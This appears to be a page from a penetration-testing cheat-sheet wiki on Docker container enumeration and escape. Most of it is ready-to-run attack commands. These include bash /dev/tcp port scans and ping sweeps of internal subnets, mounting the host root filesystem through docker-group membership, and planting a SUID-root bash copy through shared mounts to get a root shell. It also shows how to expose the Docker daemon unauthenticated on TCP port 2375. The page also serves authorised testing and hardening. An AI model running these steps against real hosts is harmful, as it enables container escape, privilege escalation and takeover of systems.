Edit

Docker

Enumeration

Host names are usually numerical IDs

Always check the environment variables

  • Confirm the presence of .dockerenv

Check if running as root
cat /proc/self/status
Check SUID/SGID
find / -type f \( -perm -4000 -o -perm -2000 \)
Check processes
ps aux
Check the namespaces
ls -al /proc/self/ns/

When the host's user information does not exist inside the container’s /etc/passwd file, file permissions will show numeric IDs instead of human-readable names.

If the socket is mounted you may be able to use docker-cli:

mount | grep docker.sock
ls -l /var/run/docker.sock

Understand the Network

Docker containers typically run in a private virtual network created by Docker, and the default network uses a subnet in the range 172.16.0.0/12

Check the IPs
ip addr
Check the routing table
cat /proc/net/fib_trie
Always ping sweep the subnets
for i in {1..254}; do (ping -c 1 172.19.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
Scan ports
for port in {1..65535}; do echo > /dev/tcp/172.19.0.1/$port && echo "$port open"; done 2>/dev/null
Use OpenSSL to scan ports
for host in 1 2 3 4; do for port in 21 22 25 80 443 8080; do (echo "172.19.0.$host:$port" && openssl s_client -connect 172.19.0.$host:$port 2>/dev/null | grep CONNECTED) & done; done; wait

Check for Mounted File Systems

cat /proc/mounts
mount | grep <directory>

Look for vulnerabilities and misconfiguration

cat /etc/docker/daemon.json
Loop to mount containers 
mkdir sda{1,2,3,4,5}
for number in 1 2 3 4 5; do mount /dev/sda$number sda$number; done
docker-cli
List running containers
docker ps

  • Check for containers running with elevated privileges (--privileged, --cap-add).

  • Look for containers that share host namespaces or file systems.

Check for docker images
docker images

Look for containers running as root or with --privileged mode:

docker inspect
Escape the container

Tools like nsenter or docker-exploit can be used to attempt escaping the container.

If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:

docker run -v /:/mnt -it bash bash

File Ownership Manipulation via Shared Mounts

  • Check permissions and ownership when you create a file from host and container:

touch from_host
touch from_container

  • If the container is miss configured and can creates files as a root, and you can access the files created by the host on the container:

    1. From the host, copy bash in to the mounted directory.

    2. From the container, change the ownership and permissions of bash to root.

    3. Execute bash as root.

cp /bin/bash .
chown root:root bash; chmod 4777 bash
./bash -p
Configure Docker to listen on a TCP port

  1. Open the Docker service file, typically at /lib/systemd/system/docker.service or /etc/systemd/system/docker.service.

  2. Change ExecStart to bind a TCP address:

ExecStart=/usr/bin/dockerd --host=tcp://0.0.0.0:2375

  1. Reload the daemon and restart Docker if needed:

systemctl daemon-reload
systemctl restart docker

  1. Connect to it using docker-cli:

export DOCKER_HOST=tcp://<host_ip>:2375
docker ps
PreviousAbusing WildcardsNextWindows Enumeration

Last updated